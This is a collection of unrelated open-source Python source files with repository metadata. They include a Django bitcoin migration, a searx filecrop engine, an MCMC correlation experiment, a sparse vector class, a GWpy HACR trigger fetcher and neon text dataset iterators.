'from_wallet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'sent_transactions'", 'to': "orm['django_bitcoin.Wallet']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'to_bitcoinaddress': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'to_wallet': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'received_transactions'", 'null': 'True', 'to': "orm['django_bitcoin.Wallet']"}),
'txid': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['django_bitcoin']
|
FuzzyHobbit/django-bitcoin
|
django_bitcoin/migrations/0010_auto__add_field_deposittransaction_confirmations__add_field_deposittra.py
|
Python
|
mit
| 8,069
|
from urllib import urlencode
from HTMLParser import HTMLParser
url = 'http://www.filecrop.com/'
search_url = url + 'search.php?{query}&size_i=0&size_f=100000000&engine_r=1&engine_d=1&engine_e=1&engine_4=1&engine_m=1&pos={index}'  # noqa
paging = True
class FilecropResultParser(HTMLParser):
def __init__(self):
HTMLParser.__init__(self)
self.__start_processing = False
self.results = []
self.result = {}
self.tr_counter = 0
self.data_counter = 0
def handle_starttag(self, tag, attrs):
if tag == 'tr':
if ('bgcolor', '#edeff5') in attrs or\
('bgcolor', '#ffffff') in attrs:
self.__start_processing = True
if not self.__start_processing:
return
if tag == 'label':
self.result['title'] = [attr[1] for attr in attrs
if attr[0] == 'title'][0]
elif tag == 'a' and ('rel', 'nofollow') in attrs\
and ('class', 'sourcelink') in attrs:
if 'content' in self.result:
self.result['content'] += [attr[1] for attr in attrs
if attr[0] == 'title'][0]
else:
self.result['content'] = [attr[1] for attr in attrs
if attr[0] == 'title'][0]
self.result['content'] += ' '
elif tag == 'a':
self.result['url'] = url + [attr[1] for attr in attrs
if attr[0] == 'href'][0]
def handle_endtag(self, tag):
if self.__start_processing is False:
return
if tag == 'tr':
self.tr_counter += 1
if self.tr_counter == 2:
self.__start_processing = False
self.tr_counter = 0
self.data_counter = 0
self.results.append(self.result)
self.result = {}
def handle_data(self, data):
if not self.__start_processing:
return
if 'content' in self.result:
self.result['content'] += data + ' '
else:
self.result['content'] = data + ' '
self.data_counter += 1
def request(query, params):
index = 1 + (params['pageno'] - 1) * 30
params['url'] = search_url.format(query=urlencode({'w': query}),
index=index)
return params
def response(resp):
parser = FilecropResultParser()
parser.feed(resp.text)
return parser.results
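# Illustrative self-test (editor's sketch; the HTML below is a hypothetical
# fragment shaped like filecrop's result rows -- two <tr> tags per result,
# as the parser expects):
if __name__ == '__main__':
    p = FilecropResultParser()
    p.feed('<tr bgcolor="#edeff5"><label title="demo.zip">demo.zip</label>'
           '<a href="/file/1">demo.zip</a></tr>'
           '<tr bgcolor="#edeff5"></tr>')
    print p.results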
|
PwnArt1st/searx
|
searx/engines/filecrop.py
|
Python
|
agpl-3.0
| 2,573
|
##############################################################################
##############################################################################
#
# Replicates results in section 4.2
#
# J. Dahlin, F. Lindsten, J. Kronander and T. B. Schön,
# Accelerating pmMH by correlating auxiliary variables.
# Pre-print, arXiv:1512.05483v1, 2015.
#
# Copyright (c) 2016 Johan Dahlin [ johan.dahlin (at) liu.se ]
# Distributed under the MIT license.
#
##############################################################################
##############################################################################
import numpy as np
import Quandl
from state import smc
from para import pmh_correlatedRVs
from models import hwsv_4parameters
##############################################################################
# Arrange the data structures
##############################################################################
sm = smc.smcSampler();
pmh = pmh_correlatedRVs.stcPMH();
##############################################################################
# Setup the system
##############################################################################
sys = hwsv_4parameters.ssm()
sys.par = np.zeros((sys.nPar,1))
sys.par[0] = 0.00;
sys.par[1] = 0.98;
sys.par[2] = 0.16;
sys.par[3] = -0.70;
sys.T = 748;
sys.xo = 0.0;
sys.version = "standard"
##############################################################################
# Generate data
##############################################################################
sys.generateData();
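# Editor's note: the simulated data generated above only initialises the model
# object; sys.y is overwritten below with real OMXS30 log-returns from Quandl.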
d = Quandl.get("NASDAQOMX/OMXS30", trim_start="2011-01-02", trim_end="2014-01-02")
y = 100.0 * np.diff(np.log(d['Index Value']))
sys.y = y[~np.isnan(y)]
##############################################################################
# Setup the parameters
##############################################################################
th = hwsv_4parameters.ssm()
th.nParInference = 4;
th.copyData(sys);
##############################################################################
# Setup the SMC algorithm
##############################################################################
sm.filter = sm.bPFrv;
sm.sortParticles = True;
sm.nPart = 50;
sm.resampFactor = 2.0;
sm.genInitialState = True;
##############################################################################
# Check correlation in the likelihood estimator
##############################################################################
nIter = 600;
ll0 = np.zeros( nIter )
ll1 = np.zeros( nIter )
pmh.rvpGlobal = 0.0;
sigmauGrid = np.arange( 0.00,1.05,0.05 );
nPartGrid = ( 1, 2, 5, 10, 20, 50 )
covPMH = np.zeros( ( len(sigmauGrid), len(nPartGrid), 3 ) )
for ii in range(len(sigmauGrid)):
pmh.sigmaU = sigmauGrid[ii];
pmh.alpha = 0.0;
for jj in range( len(nPartGrid) ):
sm.nPart = nPartGrid[jj];
pmh.rvnSamples = 1 + sm.nPart;
for kk in range(nIter):
# Sample initial random variables and compute likelihood estimate
pmh.rv = np.random.normal( size=( pmh.rvnSamples, sys.T ) );
sm.rv = pmh.rv;
sm.filter( th );
ll0[ kk ] = sm.ll;
# Propose new random variables ( Local move )
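            # Crank-Nicolson style move: rvp = sqrt(1 - sigmaU^2) * rv +
            # sigmaU * eps with eps ~ N(0, I), which preserves the N(0, I)
            # law of the auxiliary variables while correlating the two
            # likelihood estimates. (Editor's note: the uniform draw u on the
            # next line appears to be unused in this local move.)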
u = np.random.uniform()
pmh.rvp = np.sqrt( 1.0 - pmh.sigmaU**2 ) * pmh.rv + pmh.sigmaU * np.random.normal( size=(pmh.rvnSamples,sys.T) );
# Compute likelihood estimate
sm.rv = pmh.rvp;
sm.filter( th );
ll1[ kk ] = sm.ll;
covPMH[ii,jj,0] = np.var( ll0 )
covPMH[ii,jj,1] = np.cov( ll0, ll1 )[0,1]
covPMH[ii,jj,2] = np.corrcoef( ll0, ll1 )[0,1]
print( (ii,len(sigmauGrid),jj,len(nPartGrid) ) );
from matplotlib.pyplot import figure, plot  # plotting helpers (import was missing)
figure(1)
for jj in range( len(nPartGrid) ):
plot(sigmauGrid,covPMH[:,jj,2])
#
import pandas
fileOut = pandas.DataFrame( covPMH[:,:,0],index=sigmauGrid, columns=nPartGrid);
fileOut.to_csv('example3-correlation-versus-sigmau-llvar.csv');
fileOut = pandas.DataFrame( covPMH[:,:,1],index=sigmauGrid, columns=nPartGrid);
fileOut.to_csv('example3-correlation-versus-sigmau-llcov.csv');
fileOut = pandas.DataFrame( covPMH[:,:,2],index=sigmauGrid, columns=nPartGrid);
fileOut.to_csv('example3-correlation-versus-sigmau-llcorr.csv');
#sqrt( var( ll0 ) )
########################################################################
# End of file
########################################################################
|
compops/pmmh-correlated2015
|
scripts-draft1/example2-correlation-versus-sigmau.py
|
Python
|
gpl-3.0
| 4,940
|
# version code 24ea27739109+
coursera = 1
# Please fill out this stencil and submit using the provided submission script.
# Copyright 2013 Philip N. Klein
def getitem(v,k):
"""
Return the value of entry k in v.
Be sure getitem(v,k) returns 0 if k is not represented in v.f.
>>> v = Vec({'a','b','c', 'd'},{'a':2,'c':1,'d':3})
>>> v['d']
3
>>> v['b']
0
"""
    # keys absent from v.f implicitly map to zero
    return v.f.get(k, 0)
def setitem(v,k,val):
"""
Set the element of v with label d to be val.
setitem(v,d,val) should set the value for key d even if d
is not previously represented in v.f.
>>> v = Vec({'a', 'b', 'c'}, {'b':0})
>>> v['b'] = 5
>>> v['b']
5
>>> v['a'] = 1
>>> v['a']
1
>>> v['a'] = 0
>>> v['a']
0
"""
    v.f[k] = val
def equal(u,v):
"""
Return true iff u is equal to v.
Because of sparse representation, it is not enough to compare dictionaries
>>> Vec({'a', 'b', 'c'}, {'a':0}) == Vec({'a', 'b', 'c'}, {'b':0})
True
Be sure that equal(u, v) check equalities for all keys from u.f and v.f even if
some keys in u.f do not exist in v.f (or vice versa)
>>> Vec({'x','y','z'},{'y':1,'x':2}) == Vec({'x','y','z'},{'y':1,'z':0})
False
>>> Vec({'a','b','c'}, {'a':0,'c':1}) == Vec({'a','b','c'}, {'a':0,'c':1,'b':4})
False
>>> Vec({'a','b','c'}, {'a':0,'c':1,'b':4}) == Vec({'a','b','c'}, {'a':0,'c':1})
False
The keys matter:
>>> Vec({'a','b'},{'a':1}) == Vec({'a','b'},{'b':1})
False
The values matter:
>>> Vec({'a','b'},{'a':1}) == Vec({'a','b'},{'a':2})
False
"""
assert u.D == v.D
    # compare entry-by-entry over the domain so implicit zeros are handled
    return all(getitem(u, k) == getitem(v, k) for k in u.D)
def add(u,v):
"""
Returns the sum of the two vectors.
Make sure to add together values for all keys from u.f and v.f even if some keys in u.f do not
exist in v.f (or vice versa)
>>> a = Vec({'a','e','i','o','u'}, {'a':0,'e':1,'i':2})
>>> b = Vec({'a','e','i','o','u'}, {'o':4,'u':7})
>>> c = Vec({'a','e','i','o','u'}, {'a':0,'e':1,'i':2,'o':4,'u':7})
>>> a + b == c
True
>>> a == Vec({'a','e','i','o','u'}, {'a':0,'e':1,'i':2})
True
>>> b == Vec({'a','e','i','o','u'}, {'o':4,'u':7})
True
>>> d = Vec({'x','y','z'}, {'x':2,'y':1})
>>> e = Vec({'x','y','z'}, {'z':4,'y':-1})
>>> f = Vec({'x','y','z'}, {'x':2,'y':0,'z':4})
>>> d + e == f
True
>>> b + Vec({'a','e','i','o','u'}, {}) == b
True
"""
assert u.D == v.D
    return Vec(u.D, {k: getitem(u, k) + getitem(v, k) for k in u.D})
def dot(u,v):
"""
Returns the dot product of the two vectors.
>>> u1 = Vec({'a','b'}, {'a':1, 'b':2})
>>> u2 = Vec({'a','b'}, {'b':2, 'a':1})
>>> u1*u2
5
>>> u1 == Vec({'a','b'}, {'a':1, 'b':2})
True
>>> u2 == Vec({'a','b'}, {'b':2, 'a':1})
True
>>> v1 = Vec({'p','q','r','s'}, {'p':2,'s':3,'q':-1,'r':0})
>>> v2 = Vec({'p','q','r','s'}, {'p':-2,'r':5})
>>> v1*v2
-4
>>> w1 = Vec({'a','b','c'}, {'a':2,'b':3,'c':4})
>>> w2 = Vec({'a','b','c'}, {'a':12,'b':8,'c':6})
>>> w1*w2
72
The pairwise products should not be collected in a set before summing
because a set eliminates duplicates
>>> v1 = Vec({1, 2}, {1 : 3, 2 : 6})
>>> v2 = Vec({1, 2}, {1 : 2, 2 : 1})
>>> v1 * v2
12
"""
assert u.D == v.D
    # sum over keys (a generator, not a set), so duplicate products survive
    return sum(getitem(u, k) * getitem(v, k) for k in u.D)
def scalar_mul(v, alpha):
"""
Returns the scalar-vector product alpha times v.
>>> zero = Vec({'x','y','z','w'}, {})
>>> u = Vec({'x','y','z','w'},{'x':1,'y':2,'z':3,'w':4})
>>> 0*u == zero
True
>>> 1*u == u
True
>>> 0.5*u == Vec({'x','y','z','w'},{'x':0.5,'y':1,'z':1.5,'w':2})
True
>>> u == Vec({'x','y','z','w'},{'x':1,'y':2,'z':3,'w':4})
True
"""
    return Vec(v.D, {k: alpha * value for k, value in v.f.items()})
def neg(v):
"""
Returns the negation of a vector.
>>> u = Vec({2,4,6,8},{2:1,4:2,6:3,8:4})
>>> -u
Vec({8, 2, 4, 6},{8: -4, 2: -1, 4: -2, 6: -3})
>>> u == Vec({2,4,6,8},{2:1,4:2,6:3,8:4})
True
>>> -Vec({'a','b','c'}, {'a':1}) == Vec({'a','b','c'}, {'a':-1})
True
"""
    return Vec(v.D, {k: -getitem(v, k) for k in v.D})
###############################################################################################################################
class Vec:
"""
A vector has two fields:
D - the domain (a set)
f - a dictionary mapping (some) domain elements to field elements
elements of D not appearing in f are implicitly mapped to zero
"""
def __init__(self, labels, function):
self.D = labels
self.f = function
__getitem__ = getitem
__setitem__ = setitem
__neg__ = neg
__rmul__ = scalar_mul #if left arg of * is primitive, assume it's a scalar
def __mul__(self,other):
#If other is a vector, returns the dot product of self and other
if isinstance(other, Vec):
return dot(self,other)
else:
return NotImplemented # Will cause other.__rmul__(self) to be invoked
def __truediv__(self,other): # Scalar division
return (1/other)*self
__add__ = add
def __radd__(self, other):
"Hack to allow sum(...) to work with vectors"
if other == 0:
return self
def __sub__(a,b):
"Returns a vector which is the difference of a and b."
return a+(-b)
__eq__ = equal
def is_almost_zero(self):
s = 0
for x in self.f.values():
if isinstance(x, int) or isinstance(x, float):
s += x*x
elif isinstance(x, complex):
s += x*x.conjugate()
else: return False
return s < 1e-20
def __str__(v):
"pretty-printing"
D_list = sorted(v.D, key=repr)
numdec = 3
wd = dict([(k,(1+max(len(str(k)), len('{0:.{1}G}'.format(v[k], numdec))))) if isinstance(v[k], int) or isinstance(v[k], float) else (k,(1+max(len(str(k)), len(str(v[k]))))) for k in D_list])
s1 = ''.join(['{0:>{1}}'.format(str(k),wd[k]) for k in D_list])
s2 = ''.join(['{0:>{1}.{2}G}'.format(v[k],wd[k],numdec) if isinstance(v[k], int) or isinstance(v[k], float) else '{0:>{1}}'.format(v[k], wd[k]) for k in D_list])
return "\n" + s1 + "\n" + '-'*sum(wd.values()) +"\n" + s2
def __hash__(self):
"Here we pretend Vecs are immutable so we can form sets of them"
h = hash(frozenset(self.D))
for k,v in sorted(self.f.items(), key = lambda x:repr(x[0])):
if v != 0:
h = hash((h, hash(v)))
return h
def __repr__(self):
return "Vec(" + str(self.D) + "," + str(self.f) + ")"
def copy(self):
"Don't make a new copy of the domain D"
return Vec(self.D, self.f.copy())
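# Editor's addition: running this module directly executes the doctests
# embedded above, which exercise the implementations filled in here.
if __name__ == '__main__':
    import doctest
    doctest.testmod()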
|
josiah14/linear-algebra
|
programming-the-matrix/1-week/vec/vec.py
|
Python
|
mit
| 6,607
|
from engine import Engine
e = Engine()
e.add_player()
e.update_velocity('red', (1, 1))
|
vhp-jjh/online-tag
|
test_engine.py
|
Python
|
mit
| 87
|
from binary_tree import Node
class ConstructTreeFromInorderPreOrder:
def __init__(self):
self.index = 0
def _createTree(self, inorder, preorder, start, end):
if start > end:
return None
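        # locate the current preorder element (the root of this subtree) in
        # the inorder slice [start, end]; entries to its left form the left
        # subtree and entries to its right form the right subtree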
i = 0
for i in range(start, end + 1):
if preorder[self.index] == inorder[i]:
break
node = Node.newNode(preorder[self.index])
self.index += 1
node.left = self._createTree(inorder, preorder, start, i - 1)
node.right = self._createTree(inorder, preorder, i + 1, end)
return node
def createTree(self, inorder, preorder):
return self._createTree(inorder, preorder, 0, len(inorder) - 1)
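# Illustrative usage (editor's sketch; assumes binary_tree.Node exposes the
# usual .data/.left/.right attributes):
if __name__ == '__main__':
    inorder = ['D', 'B', 'E', 'A', 'F', 'C']
    preorder = ['A', 'B', 'D', 'E', 'C', 'F']
    root = ConstructTreeFromInorderPreOrder().createTree(inorder, preorder)
    print(root.data, root.left.data, root.right.data)  # expected: A B C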
|
mission-peace/interview
|
python/tree/construct_tree_from_inorder_preorder.py
|
Python
|
apache-2.0
| 704
|
import sys
import string
f = sys.stdin
g = sys.stdout
echo = 0
while 1:
l = f.readline()
if not l: break
ll=string.strip(l)
if ll=='BEGIN-LOG':
echo = 1
elif ll=='END-LOG':
echo = 0
elif echo:
l=string.replace(l,"-0.000"," 0.000") # squish annoying negative zeros
g.write(l)
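# Editor's note: typical invocation (Python 2; filters stdin to stdout,
# keeping only the text between BEGIN-LOG and END-LOG markers):
#   python trim.py < raw_output.txt > trimmed_output.txt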
|
gratefulfrog/lib
|
python/pymol/pymol_path/test/trim.py
|
Python
|
gpl-2.0
| 319
|
# -*- coding: utf-8 -*-
# Copyright (C) Duncan Macleod (2014-2020)
#
# This file is part of GWpy.
#
# GWpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GWpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GWpy. If not, see <http://www.gnu.org/licenses/>.
"""Input/output methods for tabular data.
Access to HACR triggers requires local access to the MySQL database. Users
can set the IP address of the server, and the username and password for
connections in the following environment variables
- ``HACR_DATABASE_SERVER``
- ``HACR_DATABASE_USER``
- ``HACR_DATABASE_PASSWD``
These can also be given directly to the connection function as keyword
arguments
"""
import os.path
from dateutil.relativedelta import relativedelta
from ...segments import Segment
from ...time import (to_gps, from_gps)
from .. import EventTable
from .fetch import register_fetcher
from .sql import format_db_selection
__author__ = 'Duncan Macleod <duncan.macleod@ligo.org>'
# get HACR environment variables
HACR_DATABASE_SERVER = os.getenv('HACR_DATABASE_SERVER', None)
HACR_DATABASE_USER = os.getenv('HACR_DATABASE_USER', None)
HACR_DATABASE_PASSWD = os.getenv('HACR_DATABASE_PASSWD', None)
HACR_COLUMNS = [
'gps_start',
'gps_offset',
'freq_central',
'bandwidth',
'duration',
'num_pixels',
'snr',
'totPower',
]
def get_database_names(start, end):
# convert to datetimes
start = from_gps(to_gps(start))
end = from_gps(to_gps(end))
# loop over months
dbs = []
d = start
dt = relativedelta(months=1)
while d < end:
dbs.append('geo%s' % d.strftime('%Y%m'))
d += dt
return dbs
def get_hacr_channels(db=None, gps=None, connection=None,
                      **connectkwargs):
"""Return the names of all channels present in the given HACR database
"""
# connect if needed
if connection is None:
if gps is None:
gps = from_gps('now')
if db is None:
db = get_database_names(gps, gps)[0]
        connection = connect(db=db, **connectkwargs)
# query
    out = query("select channel from job where monitorName = 'chacr'",
                connection=connection)
return [r[0] for r in out]
def get_hacr_triggers(channel, start, end, columns=HACR_COLUMNS, pid=None,
monitor='chacr', selection=None, **connectkwargs):
"""Fetch a table of HACR triggers in the given interval
"""
if columns is None:
columns = HACR_COLUMNS
columns = list(columns)
span = Segment(*map(to_gps, (start, end)))
    # parse selection for SQL query (removing leading 'where '); guard against
    # an empty selection, which would otherwise leave a dangling 'and'
    if selection:
        selectionstr = 'and %s' % format_db_selection(selection, engine=None)[6:]
    else:
        selectionstr = ''
# get database names and loop over each on
databases = get_database_names(start, end)
rows = []
for db in databases:
conn = connect(db, **connectkwargs)
cursor = conn.cursor()
# find process ID(s) for this channel
pids = query("select process_id, gps_start, gps_stop "
"from job where monitorName = %r and channel = %r"
% (monitor, str(channel)), connection=conn)
for p, s, e in pids:
# validate this process id
if pid is not None and int(p) != int(pid):
continue
tspan = Segment(float(s), float(e))
if not tspan.intersects(span):
continue
# execute trigger query
q = ('select %s from mhacr where process_id = %d and '
'gps_start > %s and gps_start < %d %s order by gps_start asc'
% (', '.join(columns), int(p), span[0], span[1],
selectionstr))
n = cursor.execute(q)
if n == 0:
continue
# get new events, convert to recarray, and append to table
rows.extend(cursor.fetchall())
return EventTable(rows=rows, names=columns)
register_fetcher('hacr', EventTable, get_hacr_triggers,
usage="channel, gpsstart, gpstop")
# -- utilities ----------------------------------------------------------------
def connect(db, host=HACR_DATABASE_SERVER, user=HACR_DATABASE_USER,
passwd=HACR_DATABASE_PASSWD):
"""Connect to the given SQL database
"""
try:
import pymysql
except ImportError as e:
e.args = ('pymysql is required to fetch HACR triggers',)
raise
return pymysql.connect(host=host, user=user, passwd=passwd, db=db)
def query(querystr, connection=None, **connectkwargs):
"""Execute a query of the given SQL database
"""
if connection is None:
connection = connect(**connectkwargs)
cursor = connection.cursor()
cursor.execute(querystr)
return cursor.fetchall()
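# Illustrative fetch (editor's sketch; requires access to the HACR MySQL
# server, and the channel name and dates here are hypothetical):
#
#   from gwpy.table import EventTable
#   events = EventTable.fetch('hacr', 'G1:DER_DATA_H',
#                             'Sep 1 2015', 'Sep 2 2015')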
|
gwpy/gwpy
|
gwpy/table/io/hacr.py
|
Python
|
gpl-3.0
| 5,205
|
# ******************************************************************************
# Copyright 2017-2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ******************************************************************************
"""
Defines text datatset handling.
"""
import logging
import numpy as np
import os
import h5py
from neon.data.dataiterator import NervanaDataIterator, ArrayIterator
from neon.data.datasets import Dataset
from neon.data.text_preprocessing import pad_sentences, pad_data
logger = logging.getLogger(__name__)
class Text(NervanaDataIterator):
"""
This class defines methods for loading and iterating over text datasets.
"""
def __init__(self, time_steps, path, vocab=None, tokenizer=None,
onehot_input=True, reverse_target=False, get_prev_target=False):
"""
Construct a text dataset object.
Arguments:
time_steps (int) : Length of a sequence.
path (str) : Path to text file.
vocab (python.set) : A set of unique tokens.
tokenizer (function) : Tokenizer function.
onehot_input (boolean): One-hot representation of input
reverse_target (boolean): for sequence to sequence models, set to
True to reverse target sequence. Also
disables shifting target by one.
get_prev_target (boolean): for sequence to sequence models, set to
True for training data to provide correct
target from previous time step as decoder
                                       input. If set, shape will be a tuple
                                       of shapes, corresponding to encoder and
                                       decoder inputs.
"""
super(Text, self).__init__(name=None)
self.seq_length = time_steps
self.onehot_input = onehot_input
self.batch_index = 0
self.reverse_target = reverse_target
self.get_prev_target = get_prev_target
X, y = self._get_data(path, tokenizer, vocab)
# reshape to preserve sentence continuity across batches
self.X = X.reshape(self.be.bsz, self.nbatches, time_steps)
self.y = y.reshape(self.be.bsz, self.nbatches, time_steps)
# stuff below this comment needs to be cleaned up and commented
self.nout = self.nclass
if self.onehot_input:
self.shape = (self.nout, time_steps)
self.dev_X = self.be.iobuf((self.nout, time_steps))
if self.get_prev_target:
self.dev_Z = self.be.iobuf((self.nout, time_steps))
else:
self.shape = (time_steps, 1)
self.dev_X = self.be.iobuf(time_steps, dtype=np.int32)
if self.get_prev_target:
self.dev_Z = self.be.iobuf(time_steps, dtype=np.int32)
self.decoder_shape = self.shape
self.dev_y = self.be.iobuf((self.nout, time_steps))
self.dev_lbl = self.be.iobuf(time_steps, dtype=np.int32)
self.dev_lblflat = self.dev_lbl.reshape((1, -1))
def _get_data(self, path, tokenizer, vocab):
text = open(path).read()
tokens = self.get_tokens(text, tokenizer)
# make this a static method
extra_tokens = len(tokens) % (self.be.bsz * self.seq_length)
if extra_tokens:
tokens = tokens[:-extra_tokens]
self.nbatches = len(tokens) // (self.be.bsz * self.seq_length)
self.ndata = self.nbatches * self.be.bsz # no leftovers
self.vocab = sorted(self.get_vocab(tokens, vocab))
self.nclass = len(self.vocab)
# vocab dicts
self.token_to_index = dict((t, i) for i, t in enumerate(self.vocab))
self.index_to_token = dict((i, t) for i, t in enumerate(self.vocab))
# map tokens to indices
X = np.asarray([self.token_to_index[t] for t in tokens], dtype=np.uint32)
if self.reverse_target:
y = X.copy()
else:
y = np.concatenate((X[1:], X[:1]))
return X, y
@staticmethod
def create_valid_file(path, valid_split=0.1):
"""
Create separate files for training and validation.
Arguments:
path(str): Path to data file.
valid_split(float, optional): Fraction of data to set aside for validation.
Returns:
str, str : Paths to train file and validation file
"""
text = open(path).read()
# create train and valid paths
filename, ext = os.path.splitext(path)
train_path = filename + '_train' + ext
valid_path = filename + '_valid' + ext
# split data
train_split = int(len(text) * (1 - valid_split))
train_text = text[:train_split]
valid_text = text[train_split:]
# write train file
with open(train_path, 'w') as train_file:
train_file.write(train_text)
# write valid file
with open(valid_path, 'w') as valid_file:
valid_file.write(valid_text)
return train_path, valid_path
@staticmethod
def get_tokens(string, tokenizer=None):
"""
Map string to a list of tokens.
Arguments:
string(str): String to be tokenized.
            tokenizer (function): Tokenizer function; if None, the string is
                treated as a sequence of characters.
Returns:
list : A list of tokens
"""
# (if tokenizer is None, we have a list of characters)
if tokenizer is None:
return string
else:
return tokenizer(string)
@staticmethod
def get_vocab(tokens, vocab=None):
"""
Construct vocabulary from the given tokens.
Arguments:
tokens(list): List of tokens.
vocab: (Default value = None)
Returns:
python.set : A set of unique tokens
"""
# (if vocab is not None, we check that it contains all tokens)
if vocab is None:
return set(tokens)
else:
vocab = set(vocab)
assert vocab >= set(tokens), "the predefined vocab must contain all the tokens"
return vocab
@staticmethod
def pad_sentences(sentences, sentence_length=None, dtype=np.int32, pad_val=0.):
"""
Deprecated, use neon.data.text_preprocessing.pad_sentences.
"""
logger.error('pad_sentences in the Text class is deprecated. This function '
'is now in neon.data.text_preprocessing.')
return pad_sentences(sentences,
sentence_length=sentence_length,
dtype=dtype,
pad_val=pad_val)
@staticmethod
def pad_data(path, vocab_size=20000, sentence_length=100, oov=2,
start=1, index_from=3, seed=113, test_split=0.2):
"""
Deprecated, use neon.data.text_preprocessing.pad_data.
"""
        logger.error('pad_data in the Text class is deprecated. This function '
                     'is now in neon.data.text_preprocessing.')
return pad_data(path,
vocab_size=vocab_size,
sentence_length=sentence_length,
oov=oov,
start=start,
index_from=index_from,
seed=seed,
test_split=test_split)
def reset(self):
"""
Reset the starting index of this dataset back to zero.
        Relevant when one wants to run repeated evaluations on the dataset
        but does not want to wrap around for the last uneven minibatch.
        Not necessary when ndata is divisible by the batch size.
"""
self.batch_index = 0
def __iter__(self):
"""
Generator that can be used to iterate over this dataset.
Yields:
tuple : the next minibatch of data.
"""
self.batch_index = 0
while self.batch_index < self.nbatches:
X_batch = self.X[:, self.batch_index, :].T.astype(np.float32, order='C')
if self.reverse_target is False:
y_batch = self.y[:, self.batch_index, :].T.astype(np.float32, order='C')
else:
# reverse target sequence
y_batch = self.y[:, self.batch_index, ::-1].T.astype(np.float32, order='C')
self.dev_lbl.set(y_batch)
self.dev_y[:] = self.be.onehot(self.dev_lblflat, axis=0)
if self.onehot_input:
self.dev_lbl.set(X_batch)
self.dev_X[:] = self.be.onehot(self.dev_lblflat, axis=0)
if self.get_prev_target:
self.dev_Z[:, self.be.bsz:] = self.dev_y[:, :-self.be.bsz]
self.dev_Z[:, 0:self.be.bsz] = 0 # zero-hot, no input
else:
self.dev_X.set(X_batch)
if self.get_prev_target:
self.dev_lbl.set(y_batch)
self.dev_Z[1:, :] = self.dev_lbl[:-1, :]
self.dev_Z[0, :] = 0
self.batch_index += 1
if self.get_prev_target:
yield (self.dev_X, self.dev_Z), self.dev_y
else:
yield self.dev_X, self.dev_y
class TextNMT(Text):
"""
Datasets for neural machine translation on French / English bilingual datasets.
Available at http://www-lium.univ-lemans.fr/~schwenk/cslm_joint_paper/data/bitexts.tgz
Arguments:
time_steps (int) : Length of a sequence.
path (str) : Path to text file.
tokenizer (function) : Tokenizer function.
onehot_input (boolean): One-hot representation of input
get_prev_target (boolean): for sequence to sequence models, set to
True for training data to provide correct
target from previous time step as decoder
                                   input. If set, shape will be a tuple
                                   of shapes, corresponding to encoder and
                                   decoder inputs.
split (str): "train" or "valid" split of the dataset
        dataset (str): 'un2000' for the United Nations dataset or 'europarl7'
                       for the European Parliament dataset.
subset_pct (float): Percentage of the dataset to use (100 is the full dataset)
"""
def __init__(self, time_steps, path, tokenizer=None,
onehot_input=False, get_prev_target=False, split=None,
dataset='un2000', subset_pct=100):
"""
Load French and English sentence data from file.
"""
assert dataset in ('europarl7', 'un2000'), "invalid dataset"
processed_file = os.path.join(path, dataset + '-' + split + '.h5')
assert os.path.exists(processed_file), "Dataset at '" + processed_file + "' not found"
self.subset_pct = subset_pct
super(TextNMT, self).__init__(time_steps, processed_file, vocab=None, tokenizer=tokenizer,
onehot_input=onehot_input, get_prev_target=get_prev_target,
reverse_target=True)
def _get_data(self, path, tokenizer, vocab):
"""
Tokenizer and vocab are unused but provided to match superclass method signature
"""
def vocab_to_dicts(vocab):
t2i = dict((t, i) for i, t in enumerate(vocab))
i2t = dict((i, t) for i, t in enumerate(vocab))
return t2i, i2t
# get saved processed data
logger.debug("Loading parsed data from %s", path)
with h5py.File(path, 'r') as f:
self.s_vocab = f['s_vocab'][:].tolist()
self.t_vocab = f['t_vocab'][:].tolist()
self.s_token_to_index, self.s_index_to_token = vocab_to_dicts(self.s_vocab)
self.t_token_to_index, self.t_index_to_token = vocab_to_dicts(self.t_vocab)
X = f['X'][:]
y = f['y'][:]
self.nclass = len(self.t_vocab)
        # Trim to the requested subset and drop any partial minibatch
if self.subset_pct < 100:
X = X[:int(X.shape[0] * self.subset_pct / 100.), :]
y = y[:int(y.shape[0] * self.subset_pct / 100.), :]
logger.debug("subset %d%% of data", self.subset_pct*100)
extra_sentences = X.shape[0] % self.be.bsz
if extra_sentences:
X = X[:-extra_sentences, :]
y = y[:-extra_sentences, :]
logger.debug("removing %d extra sentences", extra_sentences)
self.nbatches = X.shape[0] // self.be.bsz
self.ndata = self.nbatches * self.be.bsz # no leftovers
return X, y
class Shakespeare(Dataset):
"""
Shakespeare data set from http://cs.stanford.edu/people/karpathy/char-rnn.
"""
def __init__(self, timesteps, path='.'):
url = 'http://cs.stanford.edu/people/karpathy/char-rnn'
super(Shakespeare, self).__init__('shakespeare_input.txt',
url,
4573338,
path=path)
self.timesteps = timesteps
def load_data(self):
self.filepath = self.load_zip(self.filename, self.size)
return self.filepath
def gen_iterators(self):
self.load_data()
train_path, valid_path = Text.create_valid_file(self.filepath)
self._data_dict = {}
self._data_dict['train'] = Text(self.timesteps, train_path)
vocab = self._data_dict['train'].vocab
self._data_dict['valid'] = Text(self.timesteps, valid_path, vocab=vocab)
return self._data_dict
class PTB(Dataset):
"""
Penn Treebank data set from http://arxiv.org/pdf/1409.2329v5.pdf
Arguments:
timesteps (int): number of timesteps to embed the data
        onehot_input (bool): use a one-hot representation of the input
tokenizer (str): name of the tokenizer function within this
class to use on the data
"""
def __init__(self, timesteps, path='.',
onehot_input=True,
tokenizer=None,
reverse_target=False,
get_prev_target=False):
url = 'https://raw.githubusercontent.com/wojzaremba/lstm/master/data'
